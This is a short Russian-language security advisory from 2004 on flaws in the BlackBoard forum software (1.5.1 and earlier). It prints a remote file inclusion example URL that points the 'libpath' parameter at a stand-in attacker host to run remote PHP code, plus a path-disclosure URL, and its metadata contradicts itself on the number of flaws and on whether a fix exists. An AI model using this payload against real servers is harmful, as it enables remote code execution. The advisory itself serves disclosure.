Несколько уязвимостей в BlackBoard форуме

Дата публикации:
07.10.2004
Всего просмотров:
5939
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
BlackBoard Internet Newsboard System 1.x
Уязвимые версии: BlackBoard 1.5.1 и более ранние версии

Описание: Несколько уязвимостей обнаружено в BlackBoard форуме. Удаленный пользователь может выполнить произвольные команды на целевой системе.

1. Выполнение произвольного PHP кода: Пример:

http://[target]/bb_lib/checkdb .inc.php?libpath=http://[attacker]/
2. Раскрытие пути:
http://[target]/bb_lib/checkdb.inc.php

URL производителя:http://blackboard.unclassified.de/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Multiple vulnerabilities in BlackBoard

или введите имя

CAPTCHA